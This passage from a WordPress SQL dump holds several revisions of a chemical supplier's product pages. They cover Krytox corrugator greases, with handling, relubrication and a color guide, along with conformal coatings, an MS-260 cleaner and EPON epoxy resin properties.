<a href="https://www.miller-stephenson.com/product/krytox-227-fg/">227 FG</a> Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.\r\n<h4><strong>Safe Handling</strong></h4>\r\nFor detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:\r\n<ul>\r\n 	<li>When handling, wear any type of impervious gloves.</li>\r\n 	<li>Wash hands after use.</li>\r\n 	<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\r\n 	<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\r\n</ul>\r\n<h4><strong>Key Points</strong></h4>\r\n<ul>\r\n 	<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\r\n 	<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\r\n 	<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\r\n 	<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\r\n 	<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\r\n</ul>\r\n<h4><strong>Relubrication</strong></h4>\r\n<ul>\r\n 	<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\r\n 	<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\r\n 	<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\r\n 	<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\r\n</ul>\r\n<h4><strong>Disposal and Storage</strong></h4>\r\n<ul>\r\n 	<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\r\n 	<li>Keep all Krytox grease containers covered to prevent contamination.</li>\r\n</ul>\r\n&nbsp;\r\n<table width="1153">\r\n<tbody>\r\n<tr>\r\n<td width="223"><strong>Color Guide</strong></td>\r\n<td width="242"></td>\r\n<td width="688"></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Color</strong></td>\r\n<td><strong>Contamination</strong></td>\r\n<td><strong>Recommendation</strong></td>\r\n</tr>\r\n<tr>\r\n<td>White</td>\r\n<td>None</td>\r\n<td>Grease in good condition: creamy consistency.</td>\r\n</tr>\r\n<tr>\r\n<td>Gray</td>\r\n<td>0.0-0.1% iron</td>\r\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\r\n</tr>\r\n<tr>\r\n<td>Tan</td>\r\n<td>0.0-0.4% iron</td>\r\n<td>Add grease until cavity is full, bearing OK.</td>\r\n</tr>\r\n<tr>\r\n<td>Brown</td>\r\n<td>0.0-0.8% iron</td>\r\n<td>Flush bearing with grease until color lightens to tan.</td>\r\n</tr>\r\n<tr>\r\n<td>Dark Brown</td>\r\n<td>Greater than 0.8% iron</td>\r\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\r\n</tr>\r\n<tr>\r\n<td>Black</td>\r\n<td></td>\r\n<td>Replace bearing.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a>', 'Krytox Corrugator Greases', '', 'inherit', 'closed', 'closed', '', '2308-revision-v1', '', '', '2016-10-25 17:46:20', '2016-10-25 17:46:20', '', 2308, 'https://www.miller-stephenson.com/2308-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2749, 2, '2016-10-25 17:48:07', '2016-10-25 17:48:07', '<h1><span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.\r\n<h4><strong>Corrugators choose Krytox™ lubricants for many reasons:</strong></h4>\r\n<ul>\r\n 	<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\r\n 	<li>Most thermally stable H1 base oil available</li>\r\n 	<li>Reduced risk of bearing failure</li>\r\n 	<li>Conversion support and PFPE lubrication/application training available</li>\r\n</ul>\r\nKrytox greases for the corrugating industry include:\r\n\r\n<strong>Krytox Corrugator <a href="https://www.miller-stephenson.com/product/krytox-226-fg/">226 FG</a>, <a href="https://www.miller-stephenson.com/product/krytox-227-fg/">227 FG</a> Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.\r\n<h4><strong>Safe Handling</strong></h4>\r\nFor detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:\r\n<ul>\r\n 	<li>When handling, wear any type of impervious gloves.</li>\r\n 	<li>Wash hands after use.</li>\r\n 	<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\r\n 	<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\r\n</ul>\r\n<h4><strong>Key Points</strong></h4>\r\n<ul>\r\n 	<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\r\n 	<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\r\n 	<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\r\n 	<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\r\n 	<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\r\n</ul>\r\n<h4><strong>Relubrication</strong></h4>\r\n<ul>\r\n 	<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\r\n 	<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\r\n 	<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\r\n 	<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\r\n</ul>\r\n<h4><strong>Disposal and Storage</strong></h4>\r\n<ul>\r\n 	<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\r\n 	<li>Keep all Krytox grease containers covered to prevent contamination.</li>\r\n</ul>\r\n&nbsp;\r\n<table width="1153">\r\n<tbody>\r\n<tr>\r\n<td width="223"><strong>Color Guide</strong></td>\r\n<td width="242"></td>\r\n<td width="688"></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Color</strong></td>\r\n<td><strong>Contamination</strong></td>\r\n<td><strong>Recommendation</strong></td>\r\n</tr>\r\n<tr>\r\n<td>White</td>\r\n<td>None</td>\r\n<td>Grease in good condition: creamy consistency.</td>\r\n</tr>\r\n<tr>\r\n<td>Gray</td>\r\n<td>0.0-0.1% iron</td>\r\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\r\n</tr>\r\n<tr>\r\n<td>Tan</td>\r\n<td>0.0-0.4% iron</td>\r\n<td>Add grease until cavity is full, bearing OK.</td>\r\n</tr>\r\n<tr>\r\n<td>Brown</td>\r\n<td>0.0-0.8% iron</td>\r\n<td>Flush bearing with grease until color lightens to tan.</td>\r\n</tr>\r\n<tr>\r\n<td>Dark Brown</td>\r\n<td>Greater than 0.8% iron</td>\r\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\r\n</tr>\r\n<tr>\r\n<td>Black</td>\r\n<td></td>\r\n<td>Replace bearing.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Corrugator Greases" ]\r\n\r\nTo learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a>', 'Krytox Corrugator Greases', '', 'inherit', 'closed', 'closed', '', '2308-revision-v1', '', '', '2016-10-25 17:48:07', '2016-10-25 17:48:07', '', 2308, 'https://www.miller-stephenson.com/2308-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2750, 2, '2016-10-25 17:49:03', '2016-10-25 17:49:03', '<h1><span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span></h1>\n<h4><strong>Product Information</strong></h4>\n<p>Krytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.</p>\n<h4><strong>Corrugators choose Krytox™ lubricants for many reasons:</strong></h4>\n<ul>\n<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\n<li>Most thermally stable H1 base oil available</li>\n<li>Reduced risk of bearing failure</li>\n<li>Conversion support and PFPE lubrication/application training available</li>\n</ul>\n<p>Krytox greases for the corrugating industry include:</p>\n<p><strong>Krytox Corrugator <a href="https://www.miller-stephenson.com/product/krytox-226-fg/">226 FG</a>, <a href="https://www.miller-stephenson.com/product/krytox-227-fg/">227 FG</a> Greases</strong>—The standard in PFPE/PTFE greases, recognized by OEMs and operators alike as the premium performing high temperature grease. These products are NSF H-1 Food Grade certified, providing safe, non-toxic, and inert performance in food-related operations.</p>\n<h4><strong>Safe Handling</strong></h4>\n<p>For detailed information, refer to the MSDS for the specific grade of Krytox fluorinated grease that you are using. Highlights are:</p>\n<ul>\n<li>When handling, wear any type of impervious gloves.</li>\n<li>Wash hands after use.</li>\n<li>Do not smoke tobacco that may have been contaminated with Krytox grease. Inhalation of fumes from burning Krytox grease may cause a temporary flu-like illness with symptoms such as fever, chills, and sometimes cough. Symptoms are typically gone after 1–2 days.</li>\n<li>When handling Krytox solvent or HC cleaner, use adequate ventilation, and wear eye protection and any type of impervious rubber gloves.</li>\n</ul>\n<h4><strong>Key Points</strong></h4>\n<ul>\n<li>Make sure the bearings are clean and free of preservatives, hydrocarbon oils, greases, and residues before lubricating with Krytox grease; use Krytox HC Plus Cleaner or equivalent. Contaminating Krytox grease with any other lubricant will impair its lubricating value.</li>\n<li>If using pails versus cartridges, slight pooling of oil on top of the Krytox grease can occur, particularly if it has been sitting unused for a while. Simply mix it back in with a clean stirrer.</li>\n<li>Use special grease fittings—pin or button head—for Krytox grease to prevent contamination with hydrocarbon or synthetic lubricants.</li>\n<li>Use a dedicated grease gun (labeled Krytox grease only) with a swivel coupling matched to the special pin or button head grease fittings (bearing inlet ports). Fill the bearings and bearing housings completely to prevent air pockets that can collect water and debris.</li>\n<li>Prevent corrugating process materials (e.g., waxes and paper debris) from entering the bearings.</li>\n</ul>\n<h4><strong>Relubrication</strong></h4>\n<ul>\n<li>Wipe the inlet fittings clean with a clean cloth to prevent contamination of the Krytox grease.</li>\n<li>Add/replenish Krytox™ grease every three months. Pump about 1 lb (1/2 cartridge), or whatever is necessary, of Krytox™ grease into the bearing button or pin head grease fittings to force some existing grease out through the seals. It is best to rotate bearings while adding grease to prevent “channeling” of the new grease through the bearing. A more conservative approach is to follow this practice more frequently, say once a month; proportionately less Krytox grease would be needed. Pay attention to plant safety procedures when working with moving equipment.</li>\n<li>Compare expelled/purged grease with the “Color Guide” and service as noted. (This guide applies to normal wear only; contaminants will alter the grease’s appearance.)</li>\n<li>Wipe off excess Krytox grease from equipment surfaces to prevent buildup of dirt/debris attracted to surface grease.</li>\n</ul>\n<h4><strong>Disposal and Storage</strong></h4>\n<ul>\n<li>Properly dispose of used Krytox grease purged from outlet ports, seals, and/or shaft-bearing clearances according to local, state, and federal codes.</li>\n<li>Keep all Krytox grease containers covered to prevent contamination.</li>\n</ul>\n<p>&nbsp;</p>\n<table width="1153">\n<tbody>\n<tr>\n<td width="223"><strong>Color Guide</strong></td>\n<td width="242"></td>\n<td width="688"></td>\n</tr>\n<tr>\n<td><strong>Color</strong></td>\n<td><strong>Contamination</strong></td>\n<td><strong>Recommendation</strong></td>\n</tr>\n<tr>\n<td>White</td>\n<td>None</td>\n<td>Grease in good condition: creamy consistency.</td>\n</tr>\n<tr>\n<td>Gray</td>\n<td>0.0-0.1% iron</td>\n<td>Grease in good condition, normal wear in bearing; creamy consistency</td>\n</tr>\n<tr>\n<td>Tan</td>\n<td>0.0-0.4% iron</td>\n<td>Add grease until cavity is full, bearing OK.</td>\n</tr>\n<tr>\n<td>Brown</td>\n<td>0.0-0.8% iron</td>\n<td>Flush bearing with grease until color lightens to tan.</td>\n</tr>\n<tr>\n<td>Dark Brown</td>\n<td>Greater than 0.8% iron</td>\n<td>Check bearing for play and noise. If OK, flush/purge with new Krytox™ grease. If not OK, schedule bearing change.</td>\n</tr>\n<tr>\n<td>Black</td>\n<td></td>\n<td>Replace bearing.</td>\n</tr>\n</tbody>\n</table>\n[ux_product_categories ids="143" number="10"]\n\n<p>To learn more about Krytox corrugator greases please <a href="https://www.miller-stephenson.com/contact/">contact us by clicking here.</a></p>', 'Krytox Corrugator Greases', '', 'inherit', 'closed', 'closed', '', '2308-revision-v1', '', '', '2016-10-25 17:49:03', '2016-10-25 17:49:03', '', 2308, 'https://www.miller-stephenson.com/2308-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2751, 0, '2016-10-25 17:51:52', '2016-10-25 17:51:52', '', '', '', 'publish', 'closed', 'closed', '', '2751', '', '', '2016-10-25 17:51:52', '2016-10-25 17:51:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/2751/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2752, 119, '2016-10-25 18:04:53', '2016-10-25 18:04:53', '', '', '', 'publish', 'closed', 'closed', '', '2752', '', '', '2016-10-25 18:04:53', '2016-10-25 18:04:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/2752/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2753, 0, '2016-10-25 18:21:37', '2016-10-25 18:21:37', '', '', '', 'publish', 'closed', 'closed', '', '2753', '', '', '2016-10-25 18:21:37', '2016-10-25 18:21:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/2753/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2754, 3, '2016-10-25 19:14:26', '2016-10-25 19:14:26', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are four general classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-25 19:14:26', '2016-10-25 19:14:26', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2755, 3, '2016-11-25 13:41:21', '2016-11-25 13:41:21', 'A high quality Plastic,Glass &amp; Metal Cleaner MS-260 is especially suitable for non-streak cleaning of glass, metal, ceramic, polycarbonate, acrylic and plastic - including Plexiglas®. Excellent for use on dials, gauges and oscilloscopes. Also recommended for aircraft windshields. Contains no ammonia. No ODC (ozone depleting chemicals). NSN 7930-01-064-5179 (Aerosol). Proprietary cleaning technology allows for quick cleaning and fast drying for a variety of operations.  Foaming actions helps to loosen contaminates and high cleaning solvents gently dissolves solids. Contains Professional strength cleaning agents and\n\nMiller-Stephenson MS-260 Plastic, Glass &amp; Metal Cleaner is for industrial use only and is not recommend for consumer applications\n\n<strong>Features &amp; Benefits: </strong>\n<ul id="description-list">\n 	<li class="description-list-item">16oz aerosol</li>\n 	<li class="description-list-item">Excellent for use on dials, gauges and oscilloscopes</li>\n 	<li class="description-list-item">Recommended for aircraft windshields</li>\n 	<li class="description-list-item">Contains no ammonia</li>\n 	<li class="description-list-item">Non-flammable</li>\n 	<li class="description-list-item">No ODC (ozone depleting chemicals)</li>\n</ul>\n<strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong>', 'MS-260 Plastic, Glass & Metal Cleaner', 'A high quality cleaner especially suitable for non-streak cleaning of glass, metal, ceramic, polycarbonate, acrylic and plastic - including Plexiglas®. Excellent for use on dials, gauges and oscilloscopes. Also recommended for aircraft windshields. Contains no ammonia. No ODC (ozone depleting chemicals). NSN 7930-01-064-5179 (Aerosol).', 'inherit', 'closed', 'closed', '', '1338-autosave-v1', '', '', '2016-11-25 13:41:21', '2016-11-25 13:41:21', '', 1338, 'https://www.miller-stephenson.com/1338-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2756, 3, '2016-10-25 23:46:01', '2016-10-25 23:46:01', '<p class="Section1">EPON Resin 815C is a low viscosity liquid bisphenol <span class="GramE">A</span> based epoxy resin containing a commercial grade of n-butyl glycidyl ether. EPON Resin 815C is functionally equivalent to EPON Resin 815, and is suitable as a replacement for EPON Resin 815 in most applications.</p>\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\n\n<div class="Section1">\n<ul>\n 	<li>Adhesives</li>\n 	<li>Electrical casting and encapsulation</li>\n 	<li>Contact and vacuum bag laminating</li>\n 	<li>Solventless coatings</li>\n 	<li>Floor topping and grouting compositions</li>\n 	<li>Tooling</li>\n</ul>\n</div>\n<strong>Benefits</strong>\n<ul>\n 	<li>Low viscosity, allows for easy pumping and wetting of pigments and fillers</li>\n 	<li>100% reactive. Reacts with a full range of curing agents</li>\n 	<li>Provides minimal reduction of performance properties</li>\n</ul>\n<strong> </strong>\n\n<strong>Performance Properties</strong>\n\n&nbsp;\n\nTable 1 / <strong>EPON™ Resin 815C and EPON Resin 815 with EPIKURE™ Curing Agent 3282</strong>\n<table border="0" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="228">&nbsp;</td>\n<td valign="top" width="90">\n<p align="center"><b><u>Method</u></b></p>\n</td>\n<td valign="top" width="80">\n<p align="center"><b><u>Units</u></b></p>\n</td>\n<td valign="top" width="80">\n<p align="center"><b><u>A</u></b></p>\n</td>\n<td valign="top" width="80">\n<p align="center"><b><u>B</u></b></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">EPON Resin 815C</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="80">\n<p align="center">100</p>\n</td>\n<td valign="top" width="80">\n<p align="center">---</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">EPON Resin 815</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="80">\n<p align="center">---</p>\n</td>\n<td valign="top" width="80">\n<p align="center">100</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">EPIKURE™ Curing Agent 3282</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">pbw</p>\n</td>\n<td valign="top" width="80">\n<p align="center">20.5</p>\n</td>\n<td valign="top" width="80">\n<p align="center">20.9</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">&nbsp;</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228"><b>Handling Properties @ 25°C</b></td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Gel Time, 100 gram mass</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">minutes</p>\n</td>\n<td valign="top" width="80">\n<p align="center">19.6</p>\n</td>\n<td valign="top" width="80">\n<p align="center">21.3</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">&nbsp;</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228"><b>Cured State Properties</b></td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Heat Distortion Temperature</td>\n<td valign="top" width="90">\n<p align="center">ASTM D648</p>\n</td>\n<td valign="top" width="80">\n<p align="center">°C</p>\n</td>\n<td valign="top" width="80">\n<p align="center">66</p>\n</td>\n<td valign="top" width="80">\n<p align="center">72</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Tensile Sstrength</td>\n<td valign="top" width="90">\n<p align="center">ASTM D638</p>\n</td>\n<td valign="top" width="80">\n<p align="center">psi</p>\n</td>\n<td valign="top" width="80">\n<p align="center">10,800</p>\n</td>\n<td valign="top" width="80">\n<p align="center">10,600</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Tensile Elongation</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">%</p>\n</td>\n<td valign="top" width="80">\n<p align="center">6.5</p>\n</td>\n<td valign="top" width="80">\n<p align="center">6.0</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Tensile Modulus</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">ksi</p>\n</td>\n<td valign="top" width="80">\n<p align="center">457</p>\n</td>\n<td valign="top" width="80">\n<p align="center">473</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Hardness</td>\n<td valign="top" width="90">\n<p align="center">Shore D</p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">84</p>\n</td>\n<td valign="top" width="80">\n<p align="center">83</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Water Absortion <sup>1</sup></td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center">%</p>\n</td>\n<td valign="top" width="80">\n<p align="center">0.09</p>\n</td>\n<td valign="top" width="80">\n<p align="center">0.07</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">&nbsp;</td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228"><b>Electrical Properties</b></td>\n<td valign="top" width="90">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n<td valign="top" width="80">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="228">Dielectric Constant <sup>2</sup></td>\n<td valign="top" width="90">\n<p align="center">ASTM D150</p>\n</td>\n<td valign="top" 